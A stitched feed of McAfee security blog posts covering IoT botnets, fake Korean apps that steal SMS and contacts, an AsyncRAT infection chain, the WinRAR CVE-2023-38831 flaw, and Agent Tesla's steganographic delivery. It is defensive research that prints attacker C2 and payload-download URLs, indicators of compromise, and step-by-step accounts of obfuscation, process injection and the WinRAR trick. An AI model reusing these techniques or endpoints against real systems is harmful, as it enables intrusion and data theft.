The proliferation of Internet of Things (IoT) devices has ushered in a new era of digital convenience, but it has also opened the floodgates to a range of cybersecurity concerns. To navigate the complexities of this digital landscape, it’s essential to grasp five key points:

1. Insecure IoT devices pose new risks to everyone

Each device that can be hacked is a potential soldier for a botnet army, which could be used to disrupt essential parts of the internet. Such attacks can interfere with your favorite sites for streaming, socializing, shopping, healthcare, education, banking, and more. They have the potential to undermine the very foundations of our digital society. This underscores the need for proactive measures to protect our digital way of life and ensure the continued availability of essential services that have become integral to modern living. 

Dig Deeper: How Valuable Is Your Health Care Data?

2. IoT devices are coveted by hackers

Hackers will fight to retain control over them. Though the malware used in the Mirai botnets is simple, it will evolve as quickly as necessary to allow attackers to maintain control. IoT devices are significantly valuable to hackers as they can enact devastating DDoS attacks with minimal effort. As we embrace the convenience of IoT, we must also grapple with the responsibility of securing these devices to maintain the integrity and resilience of our increasingly digitized way of life.

3. DDoS Attacks from IoT Devices Are Intense and Difficult to Defend Against

Identifying and mitigating attacks from a handful of systems is manageable. However, when tens or hundreds of thousands of devices are involved, it becomes nearly impossible. The resources required to defend against such an attack are immense and expensive. For instance, a recent attack that aimed to incapacitate Brian Krebs’ security-reporting site led to Akamai’s Vice President of Web Security stating that if such attacks were sustained, they could easily cost millions in cybersecurity services to keep the site available. Attackers are unlikely to give up these always-connected devices that are ideal for forming powerful DDoS botnets.

There’s been speculation that nation-states are behind some of these attacks, but this is highly unlikely. The authors of Mirai, a prominent botnet, willingly released their code to the public, something a governmental organization would almost certainly not do. However, it’s plausible that after observing the power of IoT botnets, nation-states are developing similar strategies—ones with even more advanced capabilities. In the short term, however, cybercriminals and hacktivists will continue to be the primary drivers of these attacks.

Dig Deeper: Mirai Botnet Creates Army of IoT Orcs

4. Cybercriminals and Hacktivists Are the Main Perpetrators

In the coming months, it’s expected that criminals will discover ways to profit from these attacks, such as through extortion. The authors of Mirai voluntarily released their code to the public—an action unlikely from a government-backed team. However, the effectiveness of IoT botnets hasn’t gone unnoticed, and it’s a good bet that nation-states are already working on similar strategies but with significantly more advanced capabilities.

Over time, expect cybercriminals and hacktivists to remain the main culprits behind these attacks. In the immediate future, these groups will continue to exploit insecure IoT devices to enact devastating DDoS attacks, constantly evolving their methods to stay ahead of defenses.

Dig Deeper: Hacktivists Turn to Phishing to Fund Their Causes

5. It Will Likely Get Worse Before It Gets Better

Unfortunately, the majority of IoT devices lack robust security defenses. The devices currently being targeted are the most vulnerable, many of which have default passwords easily accessible online. Unless the owner changes the default password, hackers can quickly and easily gain control of these devices. With each device they compromise, they gain another soldier for their botnet.

To improve this situation, several factors must be addressed. Devices must be designed with security at the forefront; they must be configured correctly and continuously managed to keep their security up-to-date. This will require both technical advancements and behavioral changes to stay in line with the evolving tactics of hackers.

McAfee Pro Tip: Software updates not only enhance security but also bring new features, better compatibility, stability improvements, and feature removal. While frequent update reminders can be bothersome, they ultimately enhance the user experience, ensuring you make the most of your technology. Know more about the importance of software updates.

Final Thoughts

Securing IoT devices is now a critical issue for everyone. The sheer number of IoT devices, combined with their vulnerability, provides cybercriminals and hacktivists with a vast pool of resources to fuel potent DDoS campaigns. We are just beginning to observe the attacks and issues surrounding IoT security. Until the implementation of comprehensive controls and responsible behaviors becomes commonplace, we will continue to face these challenges. By understanding these issues, we take the first steps toward a more secure future.

Take more steps with McAfee to secure your digital future. Explore our security solutions or read our cybersecurity blogs and reports.

The post Top 5 Things to Know About Recent IoT Attacks appeared first on McAfee Blog.

Fake Android and iOS apps steal SMS and contacts in South Korea

15 November 2023 at 15:09

Authored by Dexter Shin

Most people have smartphones these days which can be used to easily search for various topics of interest on the Internet. These topics could be about enhancing their privacy, staying fit with activities like Pilates or yoga, or even finding new people to talk to. So, companies create mobile applications to make it more convenient for users and advertise these apps on their websites. But is it safe to download these advertised applications through website searches?

McAfee Mobile Research Team recently observed a malicious Android and iOS information stealer application delivered via phishing sites. This malware became active in early October and has been observed installed on more than 200 devices, according to McAfee’s telemetry. All of these devices are located in South Korea. Considering that all the distribution phishing sites are active at the time of writing this blog post, it is expected that the number of affected devices will continue to increase.

The malware author selects a service that people might find interesting and attracts victims by disguising their service. They also create phishing sites that use the resources of legitimate sites, making them appear identical and tricking users into thinking that they are the official website of the application they want to install. The phishing site also provides Android and iOS versions of the malicious application. When users eventually download and run the app through this phishing site, their contact information and SMS messages are sent to the malware author. McAfee Mobile Security detects this threat as Android/SpyAgent. For more information, visit McAfee Mobile Security.

How to distribute
We recently introduced SpyNote through a phishing campaign targeting Japan. After we found this malware and confirmed that it was targeting South Korea, we suspected it was also distributed through a phishing campaign. So we researched several communities in Korea. One of them, called Arca Live, we were able to confirm their exact distribution method.

They initially approach victims via SMS message. At this stage, the scammers pretend to be women and send seductive messages with photos. After a bit of conversation, they try to move the stage to LINE messenger. After moving to LINE Messenger, the scammer becomes more aggressive. They send victims a link to make a video call and said that it should only be done using an app that prevents capture. That link is a phishing site where malicious apps will be downloaded.

Figure 1. Distribute phishing sites from LINE messenger after moving from SMS (Red text: Scammer, Blue text: Victim)

What do phishing sites do

One of the phishing sites disguises as Camtalk, a legitimate social networking app available on the Google Play Store and Apple App Store, to trick users into downloading malicious Android and iOS applications from remote servers. It uses the same text, layout, and buttons as the legitimate Camtalk website, but instead of redirecting users to the official app store, it forces them to download the malicious application directly:

Figure 2. Comparison of legitimate site (Left) and phishing site (Right)

In addition to pretending to be a social networking app, malware authors behind this campaign also use other different themes in their phishing sites. For example, the app in first picture below offers cloud-based storage for photos and expanded functions than a default album app such as the ability to protect desired albums by setting a password. And the apps in the second and third pictures are yoga and fitness, enticing users with topics that can be easily searched nearby. The important point is normally these types of apps do not require permission to access SMS and contacts.

Figure 3.Many phishing sites in various fields

All phishing sites we found are hosted on the same IP address and they encourage users to download the app by clicking on the Google Play icon or the App Store icon.

Figure 4. Flow for downloading malicious app files

When users click the store button for their devices, their devices begin downloading the type of file (Android APK or iOS IPA) appropriate for each device from a remote server rather than the official app store. And then devices ask users to install it.

Figure 5. The process of app installation on Android

Figure 6. The process of app installation on iOS

How to sign iOS malware

iOS has more restrictive policies regarding sideloading compared to Android. On iOS devices, if an app is not signed with a legitimate developer’s signature or certificate, it must be manually allowed. This applies when attempting to install apps on iOS devices from sources other than the official app store. So, additional steps are required for an app to be installed.

Figure 7. Need to verify developer certificate on iOS

However, this iOS malware attempts to bypass this process using unique methods. Some iPhone users want to download apps through 3rd party stores rather than Apple App Store. There are many types of stores and tools on the Internet, but one of them is called Scarlet. The store shares enterprise certificates, making it easy for developers or crackers who want to use the store to share their apps with users. In other words, since users have already set the certificate to ‘Trust’ when installing the app called Scarlet, other apps using the same certificate installed afterward will be automatically verified.

Figure 8. App automatically verified after installation of 3rd party store

Their enterprise certificates can be easily downloaded by general users as well.

Figure 9. Enterprise certificate shared via messenger

The iOS malware is using these certificates. So, for devices that already have the certificate trusted using Scarlet, no additional steps are required to execute this malware. Once installed, the app can be run at any time.

Figure 10. Automatic verification and executable app

What do they want

These apps all have the same code, just the application name and icon are different. In case of Android, they require permissions to read your contacts and SMS.

Figure 11. Malicious app required sensitive permissions (Android)

In getDeviceInfo() function, android_id and the victim device’s phone number are sent to the C2 server for the purpose of identifying each device. Subsequently, in the following function, all user’s contact information and SMS messages are sent to the C2 server.

Figure 12. Sensitive data stolen by malware (Android)

And in case of iOS, they only require permission to read your contacts. And it requires the user to input their phone number to enter the chat room. Of course, this is done to identify the victim on the C2 server.

Figure 13. Malicious app required sensitive permissions (iOS)

Similarly to Android, there is code within iOS that collects contact information and the data is sent to the C2 server.

Figure 14. Sensitive data stolen by malware (iOS)

Conclusion
The focus of this ongoing campaign is targeting South Korea and there are 10 phishing sites discovered so far. This campaign can potentially be used for other malicious purposes since it steals the victim’s phone number, associated contacts, and SMS messages. So, users should consider all potential threats related to this, as the data targeted by the malware author is clear, and changes can be made to the known aspects so far.

Users should remain cautious, even if they believe they are on an official website. If the app installation does not occur through Google Play Store or Apple App Store, suspicion is warranted. Furthermore, users should always verify when the app requests permissions that seem unrelated to its intended purpose. Because it is difficult for users to actively deal with all these threats, we strongly recommend that users should install security software on their devices and always keep up to date. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience.

Indicators of Compromise (IOCs)

Indicators Indicator Type Description
hxxps://jinyoga[.]shop/ URL Phishing site
hxxps://mysecret-album[.]com/ URL Phishing site
hxxps://pilatesyoaa[.]com/ URL Phishing site
hxxps://sweetchat19[.]com/ URL Phishing site
hxxps://sweetchat23[.]com/ URL Phishing site
hxxps://telegraming[.]pro/ URL Phishing site
hxxps://dl.yoga-jin[.]com/ URL Phishing site
hxxps://aromyoga[.]com/ URL Phishing site
hxxps://swim-talk[.]com/ URL Phishing site
hxxps://spykorea[.]shop/ URL Phishing site
hxxps://api.sweetchat23[.]com/ URL C2 server
hxxps://somaonvip[.]com/ URL C2 server
ed0166fad985d252ae9c92377d6a85025e9b49cafdc06d652107e55dd137f3b2 SHA256 Android APK
2b62d3c5f552d32265aa4fb87392292474a1c3cd7f7c10fa24fb5d486f9f7665 SHA256 Android APK
4bc1b594f4e6702088cbfd035c4331a52ff22b48295a1dd130b0c0a6d41636c9 SHA256 Android APK
bb614273d75b1709e62ce764d026c287aad1fdb1b5c35d18b45324c32e666e19 SHA256 Android APK
97856de8b869999bf7a2d08910721b3508294521bc5766a9dd28d91f479eeb2e SHA256 iOS IPA
fcad6f5c29913c6ab84b0bc48c98a0b91a199ba29cbfc5becced105bb9acefd6 SHA256 iOS IPA
04721303e090160c92625c7f2504115559a124c6deb358f30ae1f43499b6ba3b SHA256 iOS Mach-O Binary
5ccd397ee38db0f7013c52f68a4f7d6a279e95bb611c71e3e2bd9b769c5a700c SHA256 iOS Mach-O Binary

 

The post Fake Android and iOS apps steal SMS and contacts in South Korea appeared first on McAfee Blog.

Unmasking AsyncRAT New Infection Chain

3 November 2023 at 12:53

Authored by Lakshya Mathur & Vignesh Dhatchanamoorthy

AsyncRAT, short for “Asynchronous Remote Access Trojan,” is a sophisticated piece of malware designed to compromise the security of computer systems and steal sensitive information. What sets AsyncRAT apart from other malware strains is its stealthy nature, making it a formidable adversary in the world of cybersecurity.

McAfee Labs has observed a recent AsyncRAT campaign being distributed through a malicious HTML file. This entire infection strategy employs a range of file types, including PowerShell, Windows Script File (WSF), VBScript (VBS), and more, in order to bypass antivirus detection measures.

Figure 1 – AsyncRAT prevalence for the last one month

Technical Analysis

A recipient receives a spam email containing a nefarious web link. When accessed, this link triggers the download of an HTML file. Within this HTML file, an ISO file is embedded, and this ISO image file harbors a WSF (Windows Script File). The WSF file subsequently establishes connections with various URLs and proceeds to execute multiple files in formats such as PowerShell, VBS (VBScript), and BAT. These executed files are employed to carry out a process injection into RegSvcs.exe, a legitimate Microsoft .NET utility. This manipulation of RegSvcs.exe allows the attacker to covertly hide their activities within a trusted system application.

Infection Chain

Figure 2 – Infection Chain

Stage 1: Analysis of HTML & WSF file

The sequence begins with a malicious URL found within the email, which initiates the download of an HTML file. Inside this HTML file, an ISO file is embedded. Further JavaScript is utilized to extract the ISO image file.

Figure 3 – Contents of HTML file

Figure 4 – Extracted ISO file when HTML is run

Within the ISO file is a WSF script labeled as “FXM_20231606_9854298542_098.wsf.” This file incorporates junk strings of data, interspersed with specific “<job>” and “<VBScript>” tags (as indicated in Figure 5 and highlighted in red). These tags are responsible for establishing a connection to the URL “hxxp://45.12.253.107:222/f[.]txt” to fetch a PowerShell file.

Figure 5 – Contents of WSF file

Stage 2: Analysis of PowerShell files

The URL “hxxp://45.12.253.107:222/f[.]txt” retrieves a text file that contains PowerShell code.

Figure 6 – Contents of the First PowerShell file

The initial PowerShell code subsequently establishes a connection to another URL, “hxxp://45.12.253.107:222/j[.]jpg,” and retrieves the second PowerShell file.

Figure 7 – Contents of Second PowerShell file

The PowerShell script drops four files into the ProgramData folder, including two PowerShell files, one VBS file, and one BAT file. The contents of these four files are embedded within this PowerShell script. It then proceeds to create a folder named “xral” in the ProgramData directory, where it writes and extracts these files, as depicted in Figure 8.

Figure 8 – Second PowerShell creating 4 files and writing content in them using [IO.File]::WriteAllText command

Figure 9 – Files extracted in the “ProgramData/xral” folder

Stage 3: Analysis of Files dropped in the ProgramData folder

Following this, the PowerShell script executes “xral.ps1,” which is responsible for establishing a scheduled task to achieve persistence. Additionally, it initiates the execution of the ” xral.vbs ” file.

Figure 10 – Content of VBS file

The VBS script proceeds to execute the “1.bat” file, which, in turn, is responsible for executing the final PowerShell script, “hrlm.ps1.”

In a nutshell, after the second powershell, the execution goes like:

xral.ps1  ->  xral.vbs  ->  1.bat  ->  hrlm.ps1

These various executions of different file types are strategically employed to circumvent both static and behavior-based antivirus detections.

Stage 4: Analysis of the final PowerShell file

Figure 11 – Content of final PowerShell file

As depicted in the preceding figure, this PowerShell file contains a PE (Portable Executable) file in hexadecimal format. This file is intended for injection into a legitimate process. In the second red-highlighted box, it’s evident that the attackers have obfuscated the process name, which will be revealed after performing a replacement operation. It is now evident that this PE file is intended for injection into “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe.” The process injection is accomplished through the Reflection Assembly load functionality of the PowerShell file, which allows access and invocation of .NET data from within PowerShell.

After the process injection, the RegSvcs utility is initiated and executed without any additional parameters.

Stage 5: Analysis of infected RegSvcs.exe

Once PowerShell successfully injects malicious code into RegSvcs, the compromised RegSvcs.exe runs, and the AsyncRAT server establishes a connection to it. The artifacts of this infected RegSvcs.exe running are illustrated in Figure 12.

Figure 12 – AsyncRAT server strings in RegSvcs

Further analysis uncovered that this sample possesses keylogging capabilities. It recorded all activities performed on the system after replication, storing this information in a “log.tmp” file within the TEMP folder for record-keeping purposes.

Figure 13 – Log file created in %temp% folder logging all keystrokes

Furthermore, this sample was actively engaged in the theft of credentials and browser-related data. Additionally, it attempted to search for cryptocurrency-related information, including data related to Bitcoin, Ethereum, and similar assets. The illicitly acquired data was being transmitted over TCP to the IP address 45[.]12.253.107 on port 8808.

Figure 14 – TCP information of RegSvcs.exe

Summary

The infection chain begins with a malicious URL embedded in a spam email, leading to the download of an HTML file containing an ISO. Within the ISO file, a WSF script connects to external URLs and downloads a PowerShell script, which, in turn, initiates a series of non-PE file executions and ultimately injects a hexadecimal-encoded PE file into the legitimate “RegSvcs.exe.” This compromised process connects to an AsyncRAT server. The malware exhibits keylogging capabilities, records user activities, and steals credentials, browser data, and crypto-related information. Data is exfiltrated over TCP to an IP address and port. This intricate chain leverages diverse file types and obfuscation methods to avoid detection, ultimately resulting in the attackers gaining remote control and successfully stealing data.

Indicator of Compromise (IOCs)

File SHA256/URL
HTML 83c96c9853245a32042e45995ffa41393eeb9891e80ebcfb09de8fae8b5055a3
ISO 97f91122e541b38492ca2a7c781bb9f6b0a2e98e5b048ec291d98c273a6c3d62
WSF ac6c6e196c9245cefbed223a3b02d16dd806523bba4e74ab1bcf55813cc5702a
PS1 0159bd243221ef7c5f392bb43643a5f73660c03dc2f74e8ba50e4aaed6c6f531
PS1 f123c1df7d17d51115950734309644e05f3a74a5565c822f17c1ca22d62c3d99
PS1 19402c43b620b96c53b03b5bcfeaa0e645f0eff0bc6e9d1c78747fafbbaf1807
VBS 34cb840b44befdd236610f103ec1d0f914528f1f256d9ab375ad43ee2887d8ce
BAT 1c3d5dea254506c5f7c714c0b05f6e2241a25373225a6a77929e4607eb934d08
PS1 83b29151a192f868362c0ecffe5c5fabe280c8baac335c79e8950fdd439e69ac
URL hxxp://45.12.253[.]107:222/f[.]txt
hxxp://45.12.253[.]107:222/j[.]jpg

The post Unmasking AsyncRAT New Infection Chain appeared first on McAfee Blog.

Exploring Winrar Vulnerability (CVE-2023-38831)

19 September 2023 at 18:43

Authored by Neil Tyagi

On 23 August 2023, NIST disclosed a critical RCE vulnerability CVE-2023-38831. It is related to an RCE vulnerability in WinRAR before version 6.23. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the harmless file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file.

Our intelligence shows that this vulnerability is being exploited as early as April 2023. Let’s look at a sample exploiting this vulnerability (Hash: bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa)

  • The image below shows that the archive is named trading_system, which hints that it is used to target traders

  • We can also see that the threat actor can craft the archive so that folder and file names are the same.
  • This is interesting as Windows doesn’t allow files and folders to have the same name in the same path.
  • This shows that it was weaponized after creating a regular zip by changing the bytes to make the file and folder name the same.
  • Also, note there is a trailing space at the end of the file and folder name (in yellow).
  • When we look inside the folder, we see many files, but the most important file is highlighted, which is a bat file containing a malicious script.
  • The bat file also has the same name as the benign file outside the folder.

  • When we check the script, we see it launches cmd in the minimized state, then goes to the temp folder where WinRAR will extract the files, then tries to find the weakicons.com file, which is present inside the folder and executes it using wmic and then exits.
  • Checking weakicons.com we find that it is a CAB SFX file.
  • We extract it to check what is inside.
  • We found a PE file, some ActiveX control objects, and two text files.
  • AMD.exe is a visual basic compiled file whose main job is to extract the dll hidden in a blob of data inside pc.txt and execute the ActiveX controls.
  • Inside add.txt, we find the registry keys it will try to manipulate
  • The first control is responsible for registering a COM object in Windows. During registration, registry keys are imported from the “add.txt” file. As a result, a specific COM object with a unique CLSID is registered in the infected system. The default value of the InprocServer32 key is populated with the path to a malicious DLL named “Core.ocx”.
  • Wmic process executes weakicons.com

  • com executes AMD.exe
  • AMD.exe extracts the encrypted dll file inside pc.txt and writes it in the romaing\nvidia folder.

  • Here, we observe AMD.exe calls reg.exe on registry keys inside add.txt
  • Timeout is also called to slow down the activities of the infection chain.
  • AMD.exe Calls rundll32 on the clsid that is registered in the registry

  • We can see successful tcp connection to threat actors C2.( ip 37[.]120[.]158[.]229)

Global Heatmap where this vulnerability is being seen in the wild(based on McAfee telemetry data)

Infection chain

How does the vulnerability work?

  • Here, we will analyze the issue causing WinRAR to execute the script instead of opening the image.
  • We will compare how WinRAR behaves when we execute an image file from a weaponized zip vs. a normal zip. So we fire up ProcMon First.

Normal.zip

Weaponized.zip

  • The above image shows that the first logical bug is how WinRAR is extracting files in the temp folder before executing them. In the case of a regular zip, only the clean image file is extracted to the temp folder, whereas in the case of a weaponized zip, even the files present inside the folder are extracted to the temp folder along with the clean image file. This is due to the same file names we have given, which makes WinRAR extract those in temp.
  • Verifying the same in the temp folder

Normal Zip

Weaponized Zip

  • In Logs, when we dig deep, we can see Winrar searches for our filename with an *, which causes it to iterate over our bat file as it has the same name, which in turn gets executed.

  • To see what’s happening under the hood, we hook a debugger and launch WinRAR by manipulating the “image file Execution options” registry key.
  • When we execute the rar file, we see the debugger getting attached to the winrar process so that we can do just-in-time debugging.
  • We put a breakpoint on the ShellExecuteExW function to see what parameters are passed to it just after clicking the jpeg file.
  • When we double-click on the image file, we can see the debugger is opened, and after a few clicks, we hit our breakpoint.

Normal zip

  • In this case, the correct parameter is passed to the ShellExecuteExW function as the file exists at this exact path.

Weaponized zip

  • In this case, an incorrect parameter is passed to the ShellExecuteExW function as the parameter contains a trailing space, and such a file does not exist on the disk.
  • When we dig deep, we find that later, it calls PathUnquoteSpacesA API call, as per MSDN. It “Removes quotes from the beginning and end of a path.”
  • As quotes are removed from the end of the path, ShellExecuteExW executes “simple_image.jpg .cmd” instead of “simple_image.jpg.”

IOC’s

Sha256 Detection
bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa Trojan:Archive/2023_38831.NEAA

 

 

  • .( ip 37[.]120[.]158[.]229)
  • REG keys

  • File path

%APPDATA%\Nvidia\Core.ocx

Recommendations

  • WinRAR users should immediately update to the latest version. WinRAR archiver, a powerful tool to process RAR and ZIP files (rarlab.com)
  • Use a licensed and updated McAfee+ subscription to stay protected.
  • Stay informed about common cyber threats and tactics used by cybercriminals. This knowledge can help you recognize potential risks and avoid scams.
  • Be very cautious when dealing with attachments from unknown sources. Only run attachments that come from trusted sources.
  • Protect your accounts by using multi-factor authentication.

The post Exploring Winrar Vulnerability (CVE-2023-38831) appeared first on McAfee Blog.

Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion

8 September 2023 at 15:47

Authored by Yashvi Shah

Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.

Generally, Agent Tesla uses deceptive emails to infect victims, disguising as business inquiries or shipment updates. Opening attachments triggers malware installation, concealed through obfuscation. The malware then communicates with a command server to extract compromised data.

The following heat map shows the current prevalence of Agent Tesla on field:

Figure 1: Agent Tesla heat map

McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.

Technical Analysis

The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.

Figure 2: Infection Chain

VBS needs scripting hosts like wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS is executed, wscript invokes the initial PowerShell command.

Figure 3: Process Tree

First PowerShell command

The first PowerShell command is encoded as illustrated here:

Figure 4: Encoded First PowerShell

Obfuscating PowerShell commands serves as a defense mechanism employed by malware authors to make their malicious intentions harder to detect. This technique involves intentionally obfuscating the code by using various tricks, such as encoding, replacing characters, or using convoluted syntax. This runtime decoding is done to hide the true nature of the command from static analysis tools that examine the code without execution. Upon decoding, achieved by substituting occurrences of ‘#@$#’ with ‘A’ and subsequently applying base64-decoding, we successfully retrieved the decrypted PowerShell content as follows:

Figure 5: Decoded content

Second PowerShell Command

The deciphered content serves as the parameter passed to the second instance of PowerShell..

Figure 6: Second PowerShell command

Deconstructing this command line for clearer comprehension:

Figure 7: Disassembled command

Steganography

As observed, the PowerShell command instructs the download of an image, from the URL that is stored in variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:

Figure 8: Downloaded image

This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable ‘base64Length’. The data enclosed between these markers is stored in ‘base64Command’. The subsequent images illustrate these markers and the content encapsulated between them.

Figure 9: Steganography

After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.

Figure 10: DLL obtained from steganography

Process Injection into RegAsm.exe

This DLL serves two purposes:

  1. Downloading and decoding the final payload
  2. Injecting it into RegAsm.exe

Figure 11: DLL loaded

In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:

$arguments = ,(‘txt.46ezabwenrtsac/42.021.871.591//:ptth’)

The instruction mandates reversing the content of this parameter and subsequently storing the outcome in the variable named ‘address.’ Upon reversing the argument, it transforms into:

http://195.178.120.24 /castrnewbaze64.txt

Figure 12: Request for payload

Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.

Figure 13: Downloaded text file

In Figure 11, at marker 2, the contents of the “text” variable are reversed and overwritten in the same variable. Subsequently, at marker 3, the data stored in the “text” variable and is subjected to base64 decoding. Following this, we determined that the file is a .NET compiled executable.

Figure 14: Final payload

In Figure 11, another activity is evident at marker 3, where the process path for the upcoming process injection is specified. The designated process path for the process injection is:

“C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe”.

Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.

Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:

Figure 15: Process Injection

By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function ‘hU0H4qUiSpCA13feW0’ is used for replacing content. For example,

“kern!”.Replace(“!”, “el32”)  à  kernel32

Class1.hU0H4qUiSpCA13feW0(“qllocEx”, “q”, “VirtualA”) à VirtualAllocEx

As a result, these functions translate into the subsequent API calls:

  1. CreateProcessA : This API call is typically employed to initiate the creation of a new process, rather than for process injection. In the context of process injection, the focus is generally on targeting an existing process and injecting code into it.
  2. VirtualAllocEx: This is often used in process injection to allocate memory within the target process to host the injected code.
  3. ReadProcessMemory: This is used to read the memory of a target process. It is typically used in reflective DLL injection to read the contents of a DLL from the injector’s memory and write it into the target process.
  4. GetThreadContext: This API is used to retrieve the context (registers, flags, etc.) of a thread within a target process. It’s useful for modifying thread execution flow during injection.
  5. Wow64GetThreadContext: This is like GetThreadContext, but it’s used when dealing with 32-bit processes on a 64-bit system.
  6. SetThreadContext: This API is used to set the context of a thread within a target process. This can be useful for modifying the execution flow.
  7. Wow64SetThreadContext: Like SetThreadContext, but for 32-bit processes on a 64-bit system.
  8. ZwUnmapViewOfSection: This is used to unmap a section of a process’s virtual address space, which could potentially be used to remove a DLL loaded into a target process during injection.
  9. WriteProcessMemory: This is used to write data into the memory of a target process. It’s commonly used for injecting code or data into a remote process.
  10. ResumeThread: This is used to resume the execution of a suspended thread, often after modifying its context or injecting code.

Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.

The ultimate executable is heavily obfuscated. It employs an extensive array of switch cases and superfluous code, strategically intended to mislead researchers and complicate analysis. Many of the functions utilize either switch cases or their equivalent constructs, to defend detection. The following snippet of code depicts this:

Figure 16: Obfuscation

Collection of data:

Fingerprinting:

Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:

  • Computer Name
  • IP information
  • Win32_baseboard
  • Serial number
  • win32_processor
  • processorID
  • Win32_NetworkAdapterConfiguration
  • MacAddress

Web Browsers:

Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.

Figure 17: Opera browser

Figure 18: Yandex browser

Figure 19: Iridium browser

Figure 20: Chromium browser

Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:

Figure 21: User data retrieval from all browsers -1

Figure 22: User data retrieval from all browsers – 2

Mail Clients:

Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:

Figure 23: Mail clients

Exfiltration:

Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.

The observed sample utilizes SMTP as its chosen method of exfiltration. This protocol is frequently favored due to its minimal overhead demands on the attacker. SMTP reduces overhead for attackers because it is efficient, widely allowed in networks, uses existing infrastructure, causes minimal anomalies, leverages compromised accounts, and appears less suspicious compared to other protocols. A single compromised email account can be used for exfiltration, streamlining the process, and minimizing the need for complex setups. They can achieve their malicious goals with just a single email account, simplifying their operations.

Figure 24: Function calls made for exfiltration.

This is the procedure by which functions are invoked to facilitate data extraction via SMTP:

  1. A specific value is provided as a parameter, and this value is processed within the functions. As a result, it ultimately determines the port number to be utilized for SMTP communication. In this case, port number 587 is used for communication.

Figure 25: Port number

  1. Next, the malware retrieves the hostname of the email address it intends to utilize i.e., corpsa.net.

Figure 26: Domain retrieval

  1. Subsequently, the email address through which communication is intended to occur is revealed.

Figure 27: Email address used

  1. Lastly, the password for that email address is provided, so that attacker can log in and can start sending out the data.

Figure 28: Password

The SMTP process as outlined involves a series of systematic steps. It begins with the processing of a specific parameter value, which subsequently determines the port number for SMTP communication. Following this, the malware retrieves the associated domain of the intended email address, revealing the address itself and ultimately providing the corresponding password. This orchestrated sequence highlights how the malware establishes a connection through SMTP, facilitating its intended operations.

Following these steps, the malware efficiently establishes a login using acquired credentials. Once authenticated, it commences the process of transmitting the harvested data to a designated email address associated with the malware itself.

Summary:

The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.

Indicators of compromise (IoC):

File MD5 SHA256
VBS file e2a4a40fe8c8823ed5a73cdc9a8fa9b9 e7a157ba1819d7af9a5f66aa9e161cce68d20792d117a90332ff797cbbd8aaa5
JPEG file ec8dfde2126a937a65454323418e28da 21c5d3ef06d8cff43816a10a37ba1804a764b7b31fe1eb3b82c144515297875f
